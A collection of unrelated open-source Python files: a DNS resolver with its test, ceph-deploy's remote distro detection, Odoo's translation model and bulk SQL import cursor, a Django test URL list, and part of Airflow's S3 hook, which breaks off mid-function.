def resolve(self, hostname, callback):
if type(hostname) != bytes:
hostname = hostname.encode('utf8')
if not hostname:
callback(None, Exception('empty hostname'))
elif common.is_ip(hostname):
callback((hostname, hostname), None)
elif hostname in self._hosts:
logging.debug('hit hosts: %s', hostname)
ip = self._hosts[hostname]
callback((hostname, ip), None)
elif hostname in self._cache:
logging.debug('hit cache: %s', hostname)
ip = self._cache[hostname]
callback((hostname, ip), None)
else:
if not is_valid_hostname(hostname):
callback(None, Exception('invalid hostname: %s' % hostname))
return
arr = self._hostname_to_cb.get(hostname, None)
if not arr:
self._hostname_status[hostname] = STATUS_IPV4
self._send_req(hostname, QTYPE_A)
self._hostname_to_cb[hostname] = [callback]
self._cb_to_hostname[callback] = hostname
else:
arr.append(callback)
# TODO send again only if waited too long
self._send_req(hostname, QTYPE_A)
def close(self):
if self._sock:
if self._loop:
self._loop.remove_periodic(self.handle_periodic)
self._loop.remove(self._sock)
self._sock.close()
self._sock = None
def test():
dns_resolver = DNSResolver()
loop = eventloop.EventLoop()
dns_resolver.add_to_loop(loop)
global counter
counter = 0
def make_callback():
global counter
def callback(result, error):
global counter
# TODO: what can we assert?
print(result, error)
counter += 1
if counter == 9:
dns_resolver.close()
loop.stop()
a_callback = callback
return a_callback
assert(make_callback() != make_callback())
dns_resolver.resolve(b'google.com', make_callback())
dns_resolver.resolve('google.com', make_callback())
dns_resolver.resolve('example.com', make_callback())
dns_resolver.resolve('ipv6.google.com', make_callback())
dns_resolver.resolve('www.facebook.com', make_callback())
dns_resolver.resolve('ns2.google.com', make_callback())
dns_resolver.resolve('invalid.@!#$%^&$@.hostname', make_callback())
dns_resolver.resolve('toooooooooooooooooooooooooooooooooooooooooooooooooo'
'ooooooooooooooooooooooooooooooooooooooooooooooooooo'
'long.hostname', make_callback())
dns_resolver.resolve('toooooooooooooooooooooooooooooooooooooooooooooooooo'
'ooooooooooooooooooooooooooooooooooooooooooooooooooo'
'ooooooooooooooooooooooooooooooooooooooooooooooooooo'
'ooooooooooooooooooooooooooooooooooooooooooooooooooo'
'ooooooooooooooooooooooooooooooooooooooooooooooooooo'
'ooooooooooooooooooooooooooooooooooooooooooooooooooo'
'long.hostname', make_callback())
loop.run()
if __name__ == '__main__':
test()
|
codenrhoden/ceph-deploy
|
refs/heads/master
|
ceph_deploy/hosts/__init__.py
|
9
|
"""
We deal (mostly) with remote hosts. To avoid special-casing each different
command (e.g. using `yum` as opposed to `apt`) we can make a one-time call to
that remote host and set all the special cases for running commands depending
on the type of distribution/version we are dealing with.
"""
import logging
from ceph_deploy import exc
from ceph_deploy.util import versions
from ceph_deploy.hosts import debian, centos, fedora, suse, remotes, rhel
from ceph_deploy.connection import get_connection
logger = logging.getLogger()
def get(hostname,
username=None,
fallback=None,
detect_sudo=True,
use_rhceph=False,
callbacks=None):
"""
Retrieve the module that matches the distribution of a ``hostname``. This
function will connect to that host and retrieve the distribution
information, then return the appropriate module and slap a few attributes
to that module defining the information it found from the hostname.
For example, if host ``node1.example.com`` is an Ubuntu server, the
``debian`` module would be returned and the following would be set::
module.name = 'ubuntu'
module.release = '12.04'
module.codename = 'precise'
:param hostname: A hostname that is reachable/resolvable over the network
:param fallback: Optional fallback to use if no supported distro is found
:param use_rhceph: Whether or not to install RH Ceph on a RHEL machine or
the community distro. Changes what host module is
returned for RHEL.
    :param callbacks: A list of callables that accept one argument (the actual
                      module that contains the connection) that will be
                      called, in order, at the end of the instantiation of the
                      module.
"""
conn = get_connection(
hostname,
username=username,
logger=logging.getLogger(hostname),
detect_sudo=detect_sudo
)
try:
conn.import_module(remotes)
except IOError as error:
if 'already closed' in getattr(error, 'message', ''):
raise RuntimeError('remote connection got closed, ensure ``requiretty`` is disabled for %s' % hostname)
distro_name, release, codename = conn.remote_module.platform_information()
if not codename or not _get_distro(distro_name):
raise exc.UnsupportedPlatform(
distro=distro_name,
codename=codename,
release=release)
machine_type = conn.remote_module.machine_type()
module = _get_distro(distro_name, use_rhceph=use_rhceph)
module.name = distro_name
module.normalized_name = _normalized_distro_name(distro_name)
module.normalized_release = _normalized_release(release)
module.distro = module.normalized_name
module.is_el = module.normalized_name in ['redhat', 'centos', 'fedora', 'scientific']
module.is_rpm = module.normalized_name in ['redhat', 'centos',
'fedora', 'scientific', 'suse']
module.is_deb = not module.is_rpm
module.release = release
module.codename = codename
module.conn = conn
module.machine_type = machine_type
module.init = module.choose_init(module)
module.packager = module.get_packager(module)
# execute each callback if any
if callbacks:
for c in callbacks:
c(module)
return module
def _get_distro(distro, fallback=None, use_rhceph=False):
if not distro:
return
distro = _normalized_distro_name(distro)
distributions = {
'debian': debian,
'ubuntu': debian,
'centos': centos,
'scientific': centos,
'redhat': centos,
'fedora': fedora,
'suse': suse,
}
if distro == 'redhat' and use_rhceph:
return rhel
else:
return distributions.get(distro) or _get_distro(fallback)
def _normalized_distro_name(distro):
distro = distro.lower()
if distro.startswith(('redhat', 'red hat')):
return 'redhat'
elif distro.startswith(('scientific', 'scientific linux')):
return 'scientific'
elif distro.startswith(('suse', 'opensuse')):
return 'suse'
elif distro.startswith('centos'):
return 'centos'
elif distro.startswith('linuxmint'):
return 'ubuntu'
return distro
def _normalized_release(release):
"""
A normalizer function to make sense of distro
release versions.
Returns an object with: major, minor, patch, and garbage
These attributes can be accessed as ints with prefixed "int"
attribute names, for example:
normalized_version.int_major
"""
# TODO: at some point deprecate this function so that we just
# use this class directly (and update every test that calls it
return versions.NormalizedVersion(release)
|
Therp/odoo
|
refs/heads/8.0
|
openerp/addons/base/ir/ir_translation.py
|
7
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2009 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import logging
from openerp import tools
import openerp.modules
from openerp.osv import fields, osv
from openerp.tools.translate import _
_logger = logging.getLogger(__name__)
TRANSLATION_TYPE = [
('field', 'Field'),
('model', 'Object'),
('rml', 'RML (deprecated - use Report)'), # Pending deprecation - to be replaced by report!
('report', 'Report/Template'),
('selection', 'Selection'),
('view', 'View'),
('wizard_button', 'Wizard Button'),
('wizard_field', 'Wizard Field'),
('wizard_view', 'Wizard View'),
('xsl', 'XSL'),
('help', 'Help'),
('code', 'Code'),
('constraint', 'Constraint'),
('sql_constraint', 'SQL Constraint')
]
class ir_translation_import_cursor(object):
"""Temporary cursor for optimizing mass insert into ir.translation
Open it (attached to a sql cursor), feed it with translation data and
finish() it in order to insert multiple translations in a batch.
"""
_table_name = 'tmp_ir_translation_import'
def __init__(self, cr, uid, parent, context):
""" Initializer
Store some values, and also create a temporary SQL table to accept
the data.
@param parent an instance of ir.translation ORM model
"""
self._cr = cr
self._uid = uid
self._context = context
self._overwrite = context.get('overwrite', False)
self._debug = False
self._parent_table = parent._table
# Note that Postgres will NOT inherit the constraints or indexes
# of ir_translation, so this copy will be much faster.
cr.execute('''CREATE TEMP TABLE %s(
imd_model VARCHAR(64),
imd_name VARCHAR(128)
) INHERITS (%s) ''' % (self._table_name, self._parent_table))
def push(self, trans_dict):
"""Feed a translation, as a dictionary, into the cursor
"""
params = dict(trans_dict, state="translated" if trans_dict['value'] else "to_translate")
if params['type'] == 'view':
# ugly hack for QWeb views - pending refactoring of translations in master
if params['imd_model'] == 'website':
params['imd_model'] = "ir.ui.view"
# non-QWeb views do not need a matching res_id -> force to 0 to avoid dropping them
elif params['res_id'] is None:
params['res_id'] = 0
self._cr.execute("""INSERT INTO %s (name, lang, res_id, src, type, imd_model, module, imd_name, value, state, comments)
VALUES (%%(name)s, %%(lang)s, %%(res_id)s, %%(src)s, %%(type)s, %%(imd_model)s, %%(module)s,
%%(imd_name)s, %%(value)s, %%(state)s, %%(comments)s)""" % self._table_name,
params)
def finish(self):
""" Transfer the data from the temp table to ir.translation
"""
cr = self._cr
if self._debug:
cr.execute("SELECT count(*) FROM %s" % self._table_name)
c = cr.fetchone()[0]
_logger.debug("ir.translation.cursor: We have %d entries to process", c)
# Step 1: resolve ir.model.data references to res_ids
cr.execute("""UPDATE %s AS ti
SET res_id = imd.res_id
FROM ir_model_data AS imd
WHERE ti.res_id IS NULL
AND ti.module IS NOT NULL AND ti.imd_name IS NOT NULL
AND ti.module = imd.module AND ti.imd_name = imd.name
AND ti.imd_model = imd.model; """ % self._table_name)
if self._debug:
cr.execute("SELECT module, imd_name, imd_model FROM %s " \
"WHERE res_id IS NULL AND module IS NOT NULL" % self._table_name)
for row in cr.fetchall():
_logger.info("ir.translation.cursor: missing res_id for %s.%s <%s> ", *row)
# Records w/o res_id must _not_ be inserted into our db, because they are
# referencing non-existent data.
cr.execute("DELETE FROM %s WHERE res_id IS NULL AND module IS NOT NULL" % \
self._table_name)
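        # Matching rule (editorial summary of find_expr): a temp row matches
        # an existing ir.translation row when lang, type, name, src and
        # module all agree and, for 'model' and 'view' rows, the res_id also
        # lines up ('view' rows additionally tolerate a NULL res_id on the
        # existing side).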
find_expr = "irt.lang = ti.lang AND irt.type = ti.type " \
" AND irt.name = ti.name AND irt.src = ti.src " \
" AND irt.module = ti.module " \
" AND ( " \
" (ti.type NOT IN ('model', 'view')) " \
" OR (ti.type = 'model' AND ti.res_id = irt.res_id) " \
" OR (ti.type = 'view' AND irt.res_id IS NULL) " \
" OR (ti.type = 'view' AND irt.res_id IS NOT NULL AND ti.res_id = irt.res_id)) "
# Step 2: update existing (matching) translations
if self._overwrite:
cr.execute("""UPDATE ONLY %s AS irt
SET value = ti.value,
state = 'translated'
FROM %s AS ti
WHERE %s AND ti.value IS NOT NULL AND ti.value != ''
""" % (self._parent_table, self._table_name, find_expr))
# Step 3: insert new translations
cr.execute("""INSERT INTO %s(name, lang, res_id, src, type, value, module, state, comments)
SELECT name, lang, res_id, src, type, value, module, state, comments
FROM %s AS ti
WHERE NOT EXISTS(SELECT 1 FROM ONLY %s AS irt WHERE %s);
""" % (self._parent_table, self._table_name, self._parent_table, find_expr))
if self._debug:
cr.execute('SELECT COUNT(*) FROM ONLY %s' % self._parent_table)
c1 = cr.fetchone()[0]
cr.execute('SELECT COUNT(*) FROM ONLY %s AS irt, %s AS ti WHERE %s' % \
(self._parent_table, self._table_name, find_expr))
c = cr.fetchone()[0]
_logger.debug("ir.translation.cursor: %d entries now in ir.translation, %d common entries with tmp", c1, c)
# Step 4: cleanup
cr.execute("DROP TABLE %s" % self._table_name)
return True
class ir_translation(osv.osv):
_name = "ir.translation"
_log_access = False
def _get_language(self, cr, uid, context):
lang_model = self.pool.get('res.lang')
lang_ids = lang_model.search(cr, uid, [('translatable', '=', True)], context=context)
lang_data = lang_model.read(cr, uid, lang_ids, ['code', 'name'], context=context)
return [(d['code'], d['name']) for d in lang_data]
def _get_src(self, cr, uid, ids, name, arg, context=None):
''' Get source name for the translation. If object type is model then
        return the value stored in the db. Otherwise return the value stored in the src field.
'''
if context is None:
context = {}
res = dict.fromkeys(ids, False)
for record in self.browse(cr, uid, ids, context=context):
if record.type != 'model':
res[record.id] = record.src
else:
model_name, field = record.name.split(',')
model = self.pool.get(model_name)
if model is not None:
# Pass context without lang, need to read real stored field, not translation
context_no_lang = dict(context, lang=None)
result = model.read(cr, uid, [record.res_id], [field], context=context_no_lang)
res[record.id] = result[0][field] if result else False
return res
def _set_src(self, cr, uid, id, name, value, args, context=None):
''' When changing source term of a translation, change its value in db for
the associated object, and the src field
'''
if context is None:
context = {}
record = self.browse(cr, uid, id, context=context)
if record.type == 'model':
model_name, field = record.name.split(',')
model = self.pool.get(model_name)
            # We need to take the context without the language information, because we want to write on the
            # value stored in the db and not on the one associated with the current language.
            # Also, not removing lang from the context triggers an error when the lang is different.
context_wo_lang = context.copy()
context_wo_lang.pop('lang', None)
model.write(cr, uid, record.res_id, {field: value}, context=context_wo_lang)
return self.write(cr, uid, id, {'src': value}, context=context)
_columns = {
'name': fields.char('Translated field', required=True),
'res_id': fields.integer('Record ID', select=True),
'lang': fields.selection(_get_language, string='Language'),
'type': fields.selection(TRANSLATION_TYPE, string='Type', select=True),
'src': fields.text('Old source'),
'source': fields.function(_get_src, fnct_inv=_set_src, type='text', string='Source'),
'value': fields.text('Translation Value'),
'module': fields.char('Module', help="Module this term belongs to", select=True),
'state': fields.selection(
[('to_translate','To Translate'),
('inprogress','Translation in Progress'),
('translated','Translated')],
string="Status",
help="Automatically set to let administators find new terms that might need to be translated"),
# aka gettext extracted-comments - we use them to flag openerp-web translation
# cfr: http://www.gnu.org/savannah-checkouts/gnu/gettext/manual/html_node/PO-Files.html
'comments': fields.text('Translation comments', select=True),
}
_defaults = {
'state': 'to_translate',
}
_sql_constraints = [ ('lang_fkey_res_lang', 'FOREIGN KEY(lang) REFERENCES res_lang(code)',
'Language code of translation item must be among known languages' ), ]
def _auto_init(self, cr, context=None):
super(ir_translation, self)._auto_init(cr, context)
# FIXME: there is a size limit on btree indexed values so we can't index src column with normal btree.
cr.execute('SELECT indexname FROM pg_indexes WHERE indexname = %s', ('ir_translation_ltns',))
if cr.fetchone():
#temporarily removed: cr.execute('CREATE INDEX ir_translation_ltns ON ir_translation (name, lang, type, src)')
cr.execute('DROP INDEX ir_translation_ltns')
cr.commit()
cr.execute('SELECT indexname FROM pg_indexes WHERE indexname = %s', ('ir_translation_lts',))
if cr.fetchone():
#temporarily removed: cr.execute('CREATE INDEX ir_translation_lts ON ir_translation (lang, type, src)')
cr.execute('DROP INDEX ir_translation_lts')
cr.commit()
# add separate hash index on src (no size limit on values), as postgres 8.1+ is able to combine separate indexes
cr.execute('SELECT indexname FROM pg_indexes WHERE indexname = %s', ('ir_translation_src_hash_idx',))
if not cr.fetchone():
cr.execute('CREATE INDEX ir_translation_src_hash_idx ON ir_translation using hash (src)')
cr.execute('SELECT indexname FROM pg_indexes WHERE indexname = %s', ('ir_translation_ltn',))
if not cr.fetchone():
cr.execute('CREATE INDEX ir_translation_ltn ON ir_translation (name, lang, type)')
cr.commit()
def _check_selection_field_value(self, cr, uid, field, value, context=None):
if field == 'lang':
return
return super(ir_translation, self)._check_selection_field_value(cr, uid, field, value, context=context)
@tools.ormcache_multi(skiparg=3, multi=6)
def _get_ids(self, cr, uid, name, tt, lang, ids):
translations = dict.fromkeys(ids, False)
if ids:
cr.execute('select res_id,value '
'from ir_translation '
'where lang=%s '
'and type=%s '
'and name=%s '
'and res_id IN %s',
(lang,tt,name,tuple(ids)))
for res_id, value in cr.fetchall():
translations[res_id] = value
return translations
def _set_ids(self, cr, uid, name, tt, lang, ids, value, src=None):
self._get_ids.clear_cache(self)
self._get_source.clear_cache(self)
cr.execute('delete from ir_translation '
'where lang=%s '
'and type=%s '
'and name=%s '
'and res_id IN %s',
(lang,tt,name,tuple(ids),))
for id in ids:
self.create(cr, uid, {
'lang':lang,
'type':tt,
'name':name,
'res_id':id,
'value':value,
'src':src,
})
return len(ids)
def _get_source_query(self, cr, uid, name, types, lang, source, res_id):
if source:
query = """SELECT value
FROM ir_translation
WHERE lang=%s
AND type in %s
AND src=%s"""
params = (lang or '', types, tools.ustr(source))
if res_id:
if isinstance(res_id, (int, long)):
res_id = (res_id,)
else:
res_id = tuple(res_id)
query += " AND res_id in %s"
params += (res_id,)
if name:
query += " AND name=%s"
params += (tools.ustr(name),)
else:
query = """SELECT value
FROM ir_translation
WHERE lang=%s
AND type in %s
AND name=%s"""
params = (lang or '', types, tools.ustr(name))
return (query, params)
@tools.ormcache(skiparg=3)
def _get_source(self, cr, uid, name, types, lang, source=None, res_id=None):
"""
Returns the translation for the given combination of name, type, language
and source. All values passed to this method should be unicode (not byte strings),
especially ``source``.
:param name: identification of the term to translate, such as field name (optional if source is passed)
:param types: single string defining type of term to translate (see ``type`` field on ir.translation), or sequence of allowed types (strings)
:param lang: language code of the desired translation
:param source: optional source term to translate (should be unicode)
:param res_id: optional resource id or a list of ids to translate (if used, ``source`` should be set)
:rtype: unicode
        :return: the requested translation, or an empty unicode string if no translation was
found and `source` was not passed
"""
# FIXME: should assert that `source` is unicode and fix all callers to always pass unicode
# so we can remove the string encoding/decoding.
if not lang:
return tools.ustr(source or '')
if isinstance(types, basestring):
types = (types,)
query, params = self._get_source_query(cr, uid, name, types, lang, source, res_id)
cr.execute(query, params)
res = cr.fetchone()
trad = res and res[0] or u''
if source and not trad:
return tools.ustr(source)
return trad
def create(self, cr, uid, vals, context=None):
if context is None:
context = {}
ids = super(ir_translation, self).create(cr, uid, vals, context=context)
self._get_source.clear_cache(self)
self._get_ids.clear_cache(self)
self.pool['ir.ui.view'].clear_cache()
return ids
def write(self, cursor, user, ids, vals, context=None):
if context is None:
context = {}
if isinstance(ids, (int, long)):
ids = [ids]
        if vals.get('src') or ('value' in vals and not vals.get('value')):
vals.update({'state':'to_translate'})
if vals.get('value'):
vals.update({'state':'translated'})
result = super(ir_translation, self).write(cursor, user, ids, vals, context=context)
self._get_source.clear_cache(self)
self._get_ids.clear_cache(self)
self.pool['ir.ui.view'].clear_cache()
return result
def unlink(self, cursor, user, ids, context=None):
if context is None:
context = {}
if isinstance(ids, (int, long)):
ids = [ids]
self._get_source.clear_cache(self)
self._get_ids.clear_cache(self)
result = super(ir_translation, self).unlink(cursor, user, ids, context=context)
return result
def translate_fields(self, cr, uid, model, id, field=None, context=None):
trans_model = self.pool[model]
domain = ['&', ('res_id', '=', id), ('name', '=like', model + ',%')]
langs_ids = self.pool.get('res.lang').search(cr, uid, [('code', '!=', 'en_US')], context=context)
if not langs_ids:
raise osv.except_osv(_('Error'), _("Translation features are unavailable until you install an extra OpenERP translation."))
langs = [lg.code for lg in self.pool.get('res.lang').browse(cr, uid, langs_ids, context=context)]
main_lang = 'en_US'
translatable_fields = []
for k, f in trans_model._fields.items():
if getattr(f, 'translate', False):
if f.inherited:
parent_id = trans_model.read(cr, uid, [id], [f.related[0]], context=context)[0][f.related[0]][0]
translatable_fields.append({'name': k, 'id': parent_id, 'model': f.base_field.model_name})
domain.insert(0, '|')
domain.extend(['&', ('res_id', '=', parent_id), ('name', '=', "%s,%s" % (f.base_field.model_name, k))])
else:
translatable_fields.append({'name': k, 'id': id, 'model': model })
if len(langs):
fields = [f.get('name') for f in translatable_fields]
record = trans_model.read(cr, uid, [id], fields, context={ 'lang': main_lang })[0]
for lg in langs:
for f in translatable_fields:
# Check if record exists, else create it (at once)
sql = """INSERT INTO ir_translation (lang, src, name, type, res_id, value)
SELECT %s, %s, %s, 'model', %s, %s WHERE NOT EXISTS
(SELECT 1 FROM ir_translation WHERE lang=%s AND name=%s AND res_id=%s AND type='model');
UPDATE ir_translation SET src = %s WHERE lang=%s AND name=%s AND res_id=%s AND type='model';
"""
src = record[f['name']] or None
name = "%s,%s" % (f['model'], f['name'])
                cr.execute(sql, (lg, src, name, f['id'], src, lg, name, f['id'], src, lg, name, id))
action = {
'name': 'Translate',
'res_model': 'ir.translation',
'type': 'ir.actions.act_window',
'view_type': 'form',
'view_mode': 'tree,form',
'domain': domain,
}
if field:
f = trans_model._fields[field]
action['context'] = {
'search_default_name': "%s,%s" % (f.base_field.model_name, field)
}
return action
def _get_import_cursor(self, cr, uid, context=None):
""" Return a cursor-like object for fast inserting translations
"""
return ir_translation_import_cursor(cr, uid, self, context=context)
def load_module_terms(self, cr, modules, langs, context=None):
context = dict(context or {}) # local copy
for module_name in modules:
modpath = openerp.modules.get_module_path(module_name)
if not modpath:
continue
for lang in langs:
lang_code = tools.get_iso_codes(lang)
base_lang_code = None
if '_' in lang_code:
base_lang_code = lang_code.split('_')[0]
# Step 1: for sub-languages, load base language first (e.g. es_CL.po is loaded over es.po)
if base_lang_code:
base_trans_file = openerp.modules.get_module_resource(module_name, 'i18n', base_lang_code + '.po')
if base_trans_file:
_logger.info('module %s: loading base translation file %s for language %s', module_name, base_lang_code, lang)
tools.trans_load(cr, base_trans_file, lang, verbose=False, module_name=module_name, context=context)
context['overwrite'] = True # make sure the requested translation will override the base terms later
                    # i18n_extra folder is for additional translations handled manually (e.g. for l10n_be)
base_trans_extra_file = openerp.modules.get_module_resource(module_name, 'i18n_extra', base_lang_code + '.po')
if base_trans_extra_file:
_logger.info('module %s: loading extra base translation file %s for language %s', module_name, base_lang_code, lang)
tools.trans_load(cr, base_trans_extra_file, lang, verbose=False, module_name=module_name, context=context)
context['overwrite'] = True # make sure the requested translation will override the base terms later
# Step 2: then load the main translation file, possibly overriding the terms coming from the base language
trans_file = openerp.modules.get_module_resource(module_name, 'i18n', lang_code + '.po')
if trans_file:
_logger.info('module %s: loading translation file (%s) for language %s', module_name, lang_code, lang)
tools.trans_load(cr, trans_file, lang, verbose=False, module_name=module_name, context=context)
elif lang_code != 'en_US':
_logger.warning('module %s: no translation for language %s', module_name, lang_code)
trans_extra_file = openerp.modules.get_module_resource(module_name, 'i18n_extra', lang_code + '.po')
if trans_extra_file:
_logger.info('module %s: loading extra translation file (%s) for language %s', module_name, lang_code, lang)
tools.trans_load(cr, trans_extra_file, lang, verbose=False, module_name=module_name, context=context)
return True
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
cainmatt/django
|
refs/heads/master
|
tests/conditional_processing/urls.py
|
360
|
from django.conf.urls import url
from . import views
urlpatterns = [
url('^condition/$', views.index),
url('^condition/last_modified/$', views.last_modified_view1),
url('^condition/last_modified2/$', views.last_modified_view2),
url('^condition/etag/$', views.etag_view1),
url('^condition/etag2/$', views.etag_view2),
]
|
adrpar/incubator-airflow
|
refs/heads/master
|
airflow/hooks/S3_hook.py
|
21
|
# -*- coding: utf-8 -*-
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import division
from future import standard_library
standard_library.install_aliases()
import logging
import re
import fnmatch
import configparser
import math
import os
from urllib.parse import urlparse
import warnings
import boto
from boto.s3.connection import S3Connection, NoHostProvided
from boto.sts import STSConnection
boto.set_stream_logger('boto')
logging.getLogger("boto").setLevel(logging.INFO)
from airflow.exceptions import AirflowException
from airflow.hooks.base_hook import BaseHook
def _parse_s3_config(config_file_name, config_format='boto', profile=None):
"""
Parses a config file for s3 credentials. Can currently
parse boto, s3cmd.conf and AWS SDK config formats
:param config_file_name: path to the config file
:type config_file_name: str
:param config_format: config type. One of "boto", "s3cmd" or "aws".
Defaults to "boto"
:type config_format: str
:param profile: profile name in AWS type config file
:type profile: str
"""
Config = configparser.ConfigParser()
if Config.read(config_file_name): # pragma: no cover
sections = Config.sections()
else:
raise AirflowException("Couldn't read {0}".format(config_file_name))
# Setting option names depending on file format
if config_format is None:
config_format = 'boto'
conf_format = config_format.lower()
if conf_format == 'boto': # pragma: no cover
if profile is not None and 'profile ' + profile in sections:
cred_section = 'profile ' + profile
else:
cred_section = 'Credentials'
elif conf_format == 'aws' and profile is not None:
cred_section = profile
else:
cred_section = 'default'
# Option names
if conf_format in ('boto', 'aws'): # pragma: no cover
key_id_option = 'aws_access_key_id'
secret_key_option = 'aws_secret_access_key'
# security_token_option = 'aws_security_token'
else:
key_id_option = 'access_key'
secret_key_option = 'secret_key'
# Actual Parsing
if cred_section not in sections:
raise AirflowException("This config file format is not recognized")
else:
try:
access_key = Config.get(cred_section, key_id_option)
secret_key = Config.get(cred_section, secret_key_option)
calling_format = None
if Config.has_option(cred_section, 'calling_format'):
calling_format = Config.get(cred_section, 'calling_format')
        except Exception:
            logging.warning("Option error while parsing the s3 config file")
raise
return (access_key, secret_key, calling_format)
class S3Hook(BaseHook):
"""
Interact with S3. This class is a wrapper around the boto library.
"""
def __init__(
self,
s3_conn_id='s3_default'):
self.s3_conn_id = s3_conn_id
self.s3_conn = self.get_connection(s3_conn_id)
self.extra_params = self.s3_conn.extra_dejson
self.profile = self.extra_params.get('profile')
self.calling_format = None
self.s3_host = None
self._creds_in_conn = 'aws_secret_access_key' in self.extra_params
self._creds_in_config_file = 's3_config_file' in self.extra_params
self._default_to_boto = False
if 'host' in self.extra_params:
self.s3_host = self.extra_params['host']
if self._creds_in_conn:
self._a_key = self.extra_params['aws_access_key_id']
self._s_key = self.extra_params['aws_secret_access_key']
if 'calling_format' in self.extra_params:
self.calling_format = self.extra_params['calling_format']
elif self._creds_in_config_file:
self.s3_config_file = self.extra_params['s3_config_file']
# The format can be None and will default to boto in the parser
self.s3_config_format = self.extra_params.get('s3_config_format')
else:
self._default_to_boto = True
# STS support for cross account resource access
self._sts_conn_required = ('aws_account_id' in self.extra_params or
'role_arn' in self.extra_params)
if self._sts_conn_required:
self.role_arn = (self.extra_params.get('role_arn') or
"arn:aws:iam::" +
self.extra_params['aws_account_id'] +
":role/" +
self.extra_params['aws_iam_role'])
self.connection = self.get_conn()
def __getstate__(self):
pickled_dict = dict(self.__dict__)
del pickled_dict['connection']
return pickled_dict
def __setstate__(self, d):
self.__dict__.update(d)
self.__dict__['connection'] = self.get_conn()
def _parse_s3_url(self, s3url):
warnings.warn(
'Please note: S3Hook._parse_s3_url() is now '
'S3Hook.parse_s3_url() (no leading underscore).',
DeprecationWarning)
return self.parse_s3_url(s3url)
@staticmethod
def parse_s3_url(s3url):
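        # e.g. parse_s3_url('s3://some-bucket/path/to/key.txt')
        # returns ('some-bucket', 'path/to/key.txt').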
parsed_url = urlparse(s3url)
if not parsed_url.netloc:
raise AirflowException('Please provide a bucket_name')
else:
bucket_name = parsed_url.netloc
key = parsed_url.path.strip('/')
return (bucket_name, key)
def get_conn(self):
"""
Returns the boto S3Connection object.
"""
if self._default_to_boto:
return S3Connection(profile_name=self.profile)
a_key = s_key = None
if self._creds_in_config_file:
a_key, s_key, calling_format = _parse_s3_config(self.s3_config_file,
self.s3_config_format,
self.profile)
elif self._creds_in_conn:
a_key = self._a_key
s_key = self._s_key
calling_format = self.calling_format
s3_host = self.s3_host
if calling_format is None:
calling_format = 'boto.s3.connection.SubdomainCallingFormat'
if s3_host is None:
s3_host = NoHostProvided
if self._sts_conn_required:
sts_connection = STSConnection(aws_access_key_id=a_key,
aws_secret_access_key=s_key,
profile_name=self.profile)
assumed_role_object = sts_connection.assume_role(
role_arn=self.role_arn,
role_session_name="Airflow_" + self.s3_conn_id
)
creds = assumed_role_object.credentials
connection = S3Connection(
aws_access_key_id=creds.access_key,
aws_secret_access_key=creds.secret_key,
calling_format=calling_format,
security_token=creds.session_token
)
else:
connection = S3Connection(aws_access_key_id=a_key,
aws_secret_access_key=s_key,
calling_format=calling_format,
host=s3_host,
profile_name=self.profile)
return connection
    def get_credentials(self):
        a_key = s_key = None
        if self._creds_in_config_file:
            a_key, s_key, _calling_format = _parse_s3_config(self.s3_config_file,
                                                             self.s3_config_format,
                                                             self.profile)
        elif self._creds_in_conn:
            a_key = self._a_key
            s_key = self._s_key
        return a_key, s_key
def check_for_bucket(self, bucket_name):
"""
Check if bucket_name exists.
:param bucket_name: the name of the bucket
:type bucket_name: str
"""
return self.connection.lookup(bucket_name) is not None
def get_bucket(self, bucket_name):
"""
Returns a boto.s3.bucket.Bucket object
:param bucket_name: the name of the bucket
:type bucket_name: str
"""
return self.connection.get_bucket(bucket_name)
def list_keys(self, bucket_name, prefix='', delimiter=''):
"""
Lists keys in a bucket under prefix and not containing delimiter
:param bucket_name: the name of the bucket
:type bucket_name: str
:param prefix: a key prefix
:type prefix: str
:param delimiter: the delimiter marks key hierarchy.
:type delimiter: str
"""
b = self.get_bucket(bucket_name)
keylist = list(b.list(prefix=prefix, delimiter=delimiter))
return [k.name for k in keylist] if keylist != [] else None
def list_prefixes(self, bucket_name, prefix='', delimiter=''):
"""
Lists prefixes in a bucket under prefix
:param bucket_name: the name of the bucket
:type bucket_name: str
:param prefix: a key prefix
:type prefix: str
:param delimiter: the delimiter marks key hierarchy.
:type delimiter: str
"""
b = self.get_bucket(bucket_name)
plist = b.list(prefix=prefix, delimiter=delimiter)
prefix_names = [p.name for p in plist
if isinstance(p, boto.s3.prefix.Prefix)]
return prefix_names if prefix_names != [] else None
def check_for_key(self, key, bucket_name=None):
"""
Checks that a key exists in a bucket
"""
if not bucket_name:
(bucket_name, key) = self.parse_s3_url(key)
bucket = self.get_bucket(bucket_name)
return bucket.get_key(key) is not None
def get_key(self, key, bucket_name=None):
"""
Returns a boto.s3.key.Key object
:param key: the path to the key
:type key: str
:param bucket_name: the name of the bucket
:type bucket_name: str
"""
if not bucket_name:
(bucket_name, key) = self.parse_s3_url(key)
bucket = self.get_bucket(bucket_name)
return bucket.get_key(key)
def check_for_wildcard_key(self,
wildcard_key, bucket_name=None, delimiter=''):
"""
Checks that a key matching a wildcard expression exists in a bucket
"""
return self.get_wildcard_key(wildcard_key=wildcard_key,
bucket_name=bucket_name,
delimiter=delimiter) is not None
def get_wildcard_key(self, wildcard_key, bucket_name=None, delimiter=''):
"""
        Returns a boto.s3.key.Key object matching the wildcard expression
        :param wildcard_key: the path to the key, which may contain
            fnmatch-style wildcards (e.g. ``*``)
        :type wildcard_key: str
:param bucket_name: the name of the bucket
:type bucket_name: str
"""
if not bucket_name:
(bucket_name, wildcard_key) = self.parse_s3_url(wildcard_key)
bucket = self.get_bucket(bucket_name)
prefix = re.split(r'[*]', wildcard_key, 1)[0]
